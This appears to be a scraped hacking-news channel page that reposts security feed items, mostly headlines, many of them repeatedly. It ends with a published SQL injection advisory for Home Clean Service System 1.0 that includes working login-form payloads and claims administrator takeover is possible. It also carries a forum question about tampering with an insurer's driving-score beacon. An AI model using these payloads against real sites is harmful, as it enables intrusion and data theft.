Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Hacking Bluetooth beacon
Has anyone explored hacking the "Drive safe and safe" Bluetooth beacon from State farm to receive a almost perfect score?
submitted by /u/TheWillyMonster
[link] [comments]
Hacking Bluetooth beacon
Has anyone explored hacking the "Drive safe and safe" Bluetooth beacon from State farm to receive a almost perfect score?
submitted by /u/TheWillyMonster
[link] [comments]
reddit
Hacking Bluetooth beacon
Has a time explored hacking the "Drive safe and safe" Bluetooth beacon from State farm to receive a almost perfect score?
Contact Point Deanonymization Vulnerability in Meta
https://lokeshdlk77.medium.com/contact-point-deanonymization-vulnerability-in-meta-90d575c4d8ef?source=rss------bug_bounty-5
https://lokeshdlk77.medium.com/contact-point-deanonymization-vulnerability-in-meta-90d575c4d8ef?source=rss------bug_bounty-5
This post is about an bug that I found on Meta (aka Facebook) which used to find a linked Primary email address of a account using mobile…Continue reading on Medium » (https://lokeshdlk77.medium.com/contact-point-deanonymization-vulnerability-in-meta-90d575c4d8ef?source=rss------bug_bounty-5)
[Question] a bit confused about some windows protocols, any recommendations ?
https://www.reddit.com/r/Pentesting/comments/udx5hf/question_a_bit_confused_about_some_windows/
<!-- SC_OFF -->Hello everyone, i'm confused with windows protocol like LDAP, RPC, SMB, ...
any resources to understand these protocols ? <!-- SC_ON --> submitted by /u/0xA1MN (https://www.reddit.com/user/0xA1MN)
[link] (https://www.reddit.com/r/Pentesting/comments/udx5hf/question_a_bit_confused_about_some_windows/) [comments] (https://www.reddit.com/r/Pentesting/comments/udx5hf/question_a_bit_confused_about_some_windows/)
https://www.reddit.com/r/Pentesting/comments/udx5hf/question_a_bit_confused_about_some_windows/
<!-- SC_OFF -->Hello everyone, i'm confused with windows protocol like LDAP, RPC, SMB, ...
any resources to understand these protocols ? <!-- SC_ON --> submitted by /u/0xA1MN (https://www.reddit.com/user/0xA1MN)
[link] (https://www.reddit.com/r/Pentesting/comments/udx5hf/question_a_bit_confused_about_some_windows/) [comments] (https://www.reddit.com/r/Pentesting/comments/udx5hf/question_a_bit_confused_about_some_windows/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Windows Privilege Escalation: Unquoted Service Paths
https://cdn-images-1.medium.com/max/825/1*QzMBFzE-1Lhek1gWV6dxWw.png
Unquoted Service Paths
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Windows Privilege Escalation: Unquoted Service Paths
https://cdn-images-1.medium.com/max/825/1*QzMBFzE-1Lhek1gWV6dxWw.png
Unquoted Service Paths
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Windows Privilege Escalation: Unquoted Service Paths
Unquoted Service Paths
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Expertos detallan 3 equipos de piratería que trabajan bajo el paraguas del grupo TA410
https://cdn-images-1.medium.com/max/1496/0*vJUBs-0zG64ztJ0h
PUBLICADO EN 28 ABRIL, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Expertos detallan 3 equipos de piratería que trabajan bajo el paraguas del grupo TA410
https://cdn-images-1.medium.com/max/1496/0*vJUBs-0zG64ztJ0h
PUBLICADO EN 28 ABRIL, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Expertos detallan 3 equipos de piratería que trabajan bajo el paraguas del grupo TA410
PUBLICADO EN 28 ABRIL, 2022POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
PicoCTF 2022 Web Exploitation
https://cdn-images-1.medium.com/max/2600/0*pdvjSR_DFtFVWErZ
Includes, Insp3ct0r, where are the robots, Power Cookie
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
PicoCTF 2022 Web Exploitation
https://cdn-images-1.medium.com/max/2600/0*pdvjSR_DFtFVWErZ
Includes, Insp3ct0r, where are the robots, Power Cookie
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PicoCTF 2022 Web Exploitation
Includes, Insp3ct0r, where are the robots, Power Cookie
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Rip Raw - Small Tool To Analyse The Memory Of Compromised Linux Systems
https://blogger.googleusercontent.com/img/a/AVvXsEipVRxftk4Z5dHq8nl9mPpF5iJxi9PJkCu7ZEgypWcIV1qVCRmCsP2bBBUfVpjnzQMG0LBDMcx69HqZIerZGKnUPXyH1gZ2UMrvOGpFxk2U5SuQUOfsGlSmZOHx6GxmwPVvKZZA-jtDCzuc1dwAziwF0eKJlnf6XpqxjAw3_zeZ5nuzEXxEMduyGspp=w640-h342 Rip Raw is a small tool to analyse the memory of compromised Linux systems. It is similar in purpose to Bulk Extractor, but particularly focused on extracting system Logs from memory dumps from Linux systems. This enables you to analyse systems without needing to generate a profile.
This is not a replacement for tools such as Rekall and Volatility which use a profile to perform a more structured analysis of memory.
Rip Raw works by taking a Raw Binary such as a Memory Dump and carves files and logs using:
*
Text/binary boundaries
*
File headers and file magic
*
Log entries
Then puts them in a zip file for secondary processing by other tools such as Cado Response or a SIEM such as Splunk (examples below). ExampleFor example, after capturing the memory of an Amazon EKS ( Elastic Kubernetes Service) system compromised with a crypto-mining worm we processed it with rip_raw:
We'll be giving a webinar on Cloud Incident Response and Ransomware on Tuesday February 1st @ https://www.brighttalk.com/webcast/19071/527346
*
We give an example of Rip Raw for analysing a compromised Amazon Kubernetes system in a talk @ https://offers.cadosecurity.com/cloud-and-kubernetes-memory-forensics
*
You can download a PDF copy of our playbook on how to respond to compromised Kubernetes systems such as Amazon EKS @ https://offers.cadosecurity.com/the-ultimate-guide-to-docker-and-kubernetes-incident-response Download Rip_Raw
___________________________
@hacking_Attack
@Hacking_Video
Rip Raw - Small Tool To Analyse The Memory Of Compromised Linux Systems
https://blogger.googleusercontent.com/img/a/AVvXsEipVRxftk4Z5dHq8nl9mPpF5iJxi9PJkCu7ZEgypWcIV1qVCRmCsP2bBBUfVpjnzQMG0LBDMcx69HqZIerZGKnUPXyH1gZ2UMrvOGpFxk2U5SuQUOfsGlSmZOHx6GxmwPVvKZZA-jtDCzuc1dwAziwF0eKJlnf6XpqxjAw3_zeZ5nuzEXxEMduyGspp=w640-h342 Rip Raw is a small tool to analyse the memory of compromised Linux systems. It is similar in purpose to Bulk Extractor, but particularly focused on extracting system Logs from memory dumps from Linux systems. This enables you to analyse systems without needing to generate a profile.
This is not a replacement for tools such as Rekall and Volatility which use a profile to perform a more structured analysis of memory.
Rip Raw works by taking a Raw Binary such as a Memory Dump and carves files and logs using:
*
Text/binary boundaries
*
File headers and file magic
*
Log entries
Then puts them in a zip file for secondary processing by other tools such as Cado Response or a SIEM such as Splunk (examples below). ExampleFor example, after capturing the memory of an Amazon EKS ( Elastic Kubernetes Service) system compromised with a crypto-mining worm we processed it with rip_raw:
python3 rip_raw.py -f eks-node-ncat-capture.mem And then the large zip of logs that Rip Raw outputs can be viewed in a tool such as Cado Response (below). Approximately 36500 log events were extracted from this memory image, along with a number of binaries such as images and executables. https://blogger.googleusercontent.com/img/a/AVvXsEipVRxftk4Z5dHq8nl9mPpF5iJxi9PJkCu7ZEgypWcIV1qVCRmCsP2bBBUfVpjnzQMG0LBDMcx69HqZIerZGKnUPXyH1gZ2UMrvOGpFxk2U5SuQUOfsGlSmZOHx6GxmwPVvKZZA-jtDCzuc1dwAziwF0eKJlnf6XpqxjAw3_zeZ5nuzEXxEMduyGspp=w640-h342 Or Splunk: https://blogger.googleusercontent.com/img/a/AVvXsEirHVe4UYf8bTKx6dBpCAgVxnDSP80irlSTVTlBdiLyZ7lBnPu7em_E0ZBjLuZBbiPZ9aKwyhO3mMC-eYwd4OLx4N4tRH3uIFn592c3ZsSv7vpVMhKoNJLn9ufk30JKiG1T1i_E8PTUzJQqbtEZZ2rMdNq9GPJTJFy6ZsdsqOhrmsB7rx_YC_BRFA8q=w640-h340 Learn More* We'll be giving a webinar on Cloud Incident Response and Ransomware on Tuesday February 1st @ https://www.brighttalk.com/webcast/19071/527346
*
We give an example of Rip Raw for analysing a compromised Amazon Kubernetes system in a talk @ https://offers.cadosecurity.com/cloud-and-kubernetes-memory-forensics
*
You can download a PDF copy of our playbook on how to respond to compromised Kubernetes systems such as Amazon EKS @ https://offers.cadosecurity.com/the-ultimate-guide-to-docker-and-kubernetes-incident-response Download Rip_Raw
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Rip Raw - Small Tool To Analyse The Memory Of Compromised Linux Systems
Gamified Vaults: Play, Find, Get Paid
Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their solidity…Continue reading on Medium »
Read more...
Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their solidity…Continue reading on Medium »
Read more...
Gamified Vaults: Play, Find, Get Paid
https://hatsfinance.medium.com/gamified-vaults-play-find-get-paid-e1dd769a9adb?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://hatsfinance.medium.com/gamified-vaults-play-find-get-paid-e1dd769a9adb?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Gamified Vaults: Play, Find, Get Paid
Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their Solidity…
Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their solidity…Continue reading on Medium » (https://hatsfinance.medium.com/gamified-vaults-play-find-get-paid-e1dd769a9adb?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Gamified Vaults: Play, Find, Get Paid
Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their Solidity…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Home Clean Service System 1.0 SQL Injection
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Home Clean Service System 1.0 SQL Injection
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
713a953a97cc2b254906ef14b96aecd818ac74f87d3c6e66fe86d43c4f287826Download
## Title: Home Clean Service System v1.0 - 2022 SQLi
## Author: nu11secur1ty
## Date: 04.27.2022
## Vendor: https://www.sourcecodester.com/users/acetech
## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System
## Description:
The `password` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the password parameter, and a database
error message was returned.
Two single quotes were then submitted and the error message disappeared.
The attacker can take administrator account control and also of all
accounts on this system, also the malicious user can download all
information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: MULTIPART email ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT
COUNT(*),CONCAT(0x7176716271,(SELECT
(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM
(SELECT(SLEEP(5)))kgBM)-- GxTm
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)
## Proof and Exploit:
[href](https://streamable.com/l107o6)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Home Clean Service System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.